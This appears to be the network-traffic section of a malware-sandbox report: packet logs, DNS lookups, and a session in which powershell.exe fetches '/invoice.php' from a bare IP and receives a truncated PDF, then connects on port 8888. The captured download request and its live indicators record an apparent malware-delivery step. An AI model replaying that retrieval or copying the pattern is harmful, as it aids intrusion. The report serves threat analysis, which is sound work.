                          Jan 14, 2025 08:56:29.204607964 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204618931 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204622984 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204631090 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204642057 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204649925 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204651117 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204662085 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204667091 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204673052 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204684019 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204694986 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204696894 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204729080 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204750061 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204766035 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204777002 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204792023 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204802990 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204804897 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204819918 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204821110 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204833031 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204843044 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204849958 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204853058 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204859018 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204869986 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204880953 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.204898119 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.204932928 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.230463982 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.230493069 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.230504036 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.230515003 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.230525017 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.230535030 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.230546951 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.230557919 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.230587006 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.242420912 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.242450953 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.242461920 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.242474079 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.242480040 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.242487907 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.242512941 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.242537022 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.255762100 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255783081 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255803108 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255817890 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255829096 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255827904 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.255840063 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255851984 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255857944 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.255865097 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255875111 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255877972 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.255887985 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255898952 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255908966 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255918026 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.255919933 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255932093 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255935907 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.255944014 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.255954981 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.255974054 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.288897991 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.288959980 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289011955 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289012909 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289063931 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289098024 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289119005 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289149046 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289181948 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289187908 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289232969 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289267063 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289279938 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289300919 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289361000 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289371014 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289405107 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289449930 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289453983 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289489031 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289516926 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289536953 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289566040 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289609909 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289616108 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289650917 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289685011 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289699078 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289735079 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289767981 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289777994 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289800882 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289834023 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289841890 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289882898 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289918900 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289927959 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.289951086 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289983988 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.289994001 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290028095 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290070057 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290077925 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290110111 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290143967 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290163994 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290177107 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290225029 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290229082 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290265083 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290297985 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290333986 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290333986 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290368080 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290380955 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290396929 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290442944 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290446997 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290481091 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290513992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290527105 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290564060 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290596962 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290621042 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290630102 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290662050 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290682077 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290695906 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290729046 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290740967 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290761948 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290795088 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290800095 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290829897 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290862083 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290874004 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290903091 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290941954 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.290951967 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.290978909 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291012049 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291023016 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291044950 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291078091 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291089058 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291110992 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291143894 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291156054 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291177034 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291208982 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291223049 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291241884 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291275024 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291285038 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291309118 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291363001 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291378975 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291412115 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291445971 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291479111 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291512012 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291544914 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291579008 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291615009 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291647911 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291681051 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291707039 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291713953 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291743040 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291748047 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291779995 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291790009 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291812897 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291845083 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291858912 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291878939 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291913033 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291927099 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.291946888 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291980028 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.291986942 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.292013884 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292047024 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292056084 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.292079926 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292113066 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292141914 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.292148113 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292182922 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292196989 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.292217016 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292249918 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292258024 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.292282104 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.292329073 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.320410013 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.320467949 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.320511103 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.320529938 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.320544958 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.320579052 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.320593119 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.320611954 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.320655107 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.328660011 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.333554983 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.333569050 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.333609104 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345421076 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345453024 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345504999 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345506907 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345557928 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345604897 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345609903 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345662117 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345694065 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345698118 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345727921 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345761061 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345767975 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345794916 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345827103 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345846891 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345860004 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345891953 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345907927 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345926046 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345958948 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.345973015 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.345993996 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.346035957 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.378887892 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.378951073 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.378987074 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379036903 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379040956 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379071951 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379090071 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379103899 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379138947 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379154921 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379172087 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379205942 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379220963 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379239082 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379272938 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379285097 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379304886 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379358053 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379359007 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379390955 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379425049 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379436016 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379455090 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379487991 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379502058 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379523993 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379555941 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379573107 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.379589081 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379623890 CET8049704193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:29.379635096 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.428400993 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.589438915 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.593071938 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:29.751020908 CET4970480192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:30.399338007 CET497058888192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:30.404256105 CET888849705193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:30.404383898 CET497058888192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:30.404680014 CET497058888192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:30.409472942 CET888849705193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:31.197123051 CET888849705193.143.1.205192.168.2.8
                          Jan 14, 2025 08:56:31.241009951 CET497058888192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:31.667337894 CET497058888192.168.2.8193.143.1.205
                          Jan 14, 2025 08:56:58.592358112 CET6185953192.168.2.81.1.1.1
                          Jan 14, 2025 08:56:58.597275972 CET53618591.1.1.1192.168.2.8
                          Jan 14, 2025 08:56:58.597433090 CET6185953192.168.2.81.1.1.1
                          Jan 14, 2025 08:56:58.597475052 CET6185953192.168.2.81.1.1.1
                          Jan 14, 2025 08:56:58.602430105 CET53618591.1.1.1192.168.2.8
                          Jan 14, 2025 08:56:59.136504889 CET53618591.1.1.1192.168.2.8
                          Jan 14, 2025 08:56:59.138652086 CET6185953192.168.2.81.1.1.1
                          Jan 14, 2025 08:56:59.143697023 CET53618591.1.1.1192.168.2.8
                          Jan 14, 2025 08:56:59.146414995 CET6185953192.168.2.81.1.1.1
                          TimestampSource PortDest PortSource IPDest IP
                          Jan 14, 2025 08:56:38.554697037 CET4931653192.168.2.81.1.1.1
                          Jan 14, 2025 08:56:57.210947990 CET6324153192.168.2.81.1.1.1
                          Jan 14, 2025 08:56:58.591866016 CET53509831.1.1.1192.168.2.8
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jan 14, 2025 08:56:38.554697037 CET192.168.2.81.1.1.10x9779Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                          Jan 14, 2025 08:56:57.210947990 CET192.168.2.81.1.1.10x9850Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jan 14, 2025 08:56:36.885368109 CET1.1.1.1192.168.2.80x77fdNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          Jan 14, 2025 08:56:36.885368109 CET1.1.1.1192.168.2.80x77fdNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          Jan 14, 2025 08:56:38.566972017 CET1.1.1.1192.168.2.80x9779No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                          Jan 14, 2025 08:56:57.218381882 CET1.1.1.1192.168.2.80x9850No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                          • 193.143.1.205
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849704193.143.1.205801036C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          TimestampBytes transferredDirectionData
                          Jan 14, 2025 08:56:27.798816919 CET169OUTGET /invoice.php HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                          Host: 193.143.1.205
                          Connection: Keep-Alive
                          Jan 14, 2025 08:56:28.623066902 CET1236INHTTP/1.1 200 OK
                          Server: nginx/1.22.1
                          Date: Tue, 14 Jan 2025 07:56:28 GMT
                          Content-Type: application/pdf
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          X-Frame-Options: SAMEORIGIN
                          Data Raw: 31 66 36 61 0d 0a 25 50 44 46 2d 31 2e 37 0a 25 bf f7 a2 fe 0a 31 20 30 20 6f 62 6a 0a 3c 3c 20 2f 50 61 67 65 73 20 33 20 30 20 52 20 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 20 3e 3e 0a 65 6e 64 6f 62 6a 0a 32 20 30 20 6f 62 6a 0a 3c 3c 20 2f 54 79 70 65 20 2f 4f 62 6a 53 74 6d 20 2f 4c 65 6e 67 74 68 20 35 36 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 2f 4e 20 31 20 2f 46 69 72 73 74 20 34 20 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c 33 56 30 e0 b2 b1 51 d0 77 ce 2f cd 2b 51 30 54 d0 f7 ce 4c 29 56 88 56 30 51 30 50 08 52 88 55 d0 0f a9 2c 48 55 d0 0f 48 4c 4f 2d 56 b0 b3 e3 02 00 25 30 0c 6d 65 6e 64 73 74 72 65 61 6d 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 20 2f 43 6f 6e 74 65 6e 74 73 20 35 20 30 20 52 20 2f 47 72 6f 75 70 20 3c 3c 20 2f 43 53 20 2f 44 65 76 69 63 65 52 47 42 20 2f 49 20 74 72 75 65 20 2f 53 20 2f 54 72 61 6e 73 70 61 72 65 6e 63 79 20 2f 54 79 70 65 20 2f 47 72 6f 75 70 20 3e 3e 20 2f 4d 65 64 69 61 42 6f 78 20 5b 20 30 20 30 20 35 39 34 2e 39 [TRUNCATED]
                          Data Ascii: 1f6a%PDF-1.7%1 0 obj<< /Pages 3 0 R /Type /Catalog >>endobj2 0 obj<< /Type /ObjStm /Length 56 /Filter /FlateDecode /N 1 /First 4 >>streamx3V0Qw/+Q0TL)VV0Q0PRU,HUHLO-V%0mendstreamendobj4 0 obj<< /Contents 5 0 R /Group << /CS /DeviceRGB /I true /S /Transparency /Type /Group >> /MediaBox [ 0 0 594.96 840.96 ] /Parent 3 0 R /Resources 6 0 R /StructParents 0 /Type /Page >>endobj5 0 obj<< /Filter /FlateDecode /Length 75 >>streamx3T0B]C aabgiUeE\ E&@yC:lBWB!P9D~K>W &endstreamendobj6 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> >> /XObject << /x7 7 0 R >> >>endobj7 0 obj<< /BBox [ 0 0 595 841 ] /Filter /FlateDecode /Resources 8 0 R /Subtype /Form /Type /XObject /Length 59 >>streamx+T(O/6PH/*244S0B]HOS04TpBendstreamendobj8 0 obj<< /ExtGState << /a0 << /CA 1 /ca 1 >> /gs0 << /BM /Normal /CA 1.0 /SMask /None /ca 1.0 >> >> /XObject << /x11 9 0 R >> >>endobj9 0 obj<< /BitsPerComponen [TRUNCATED]
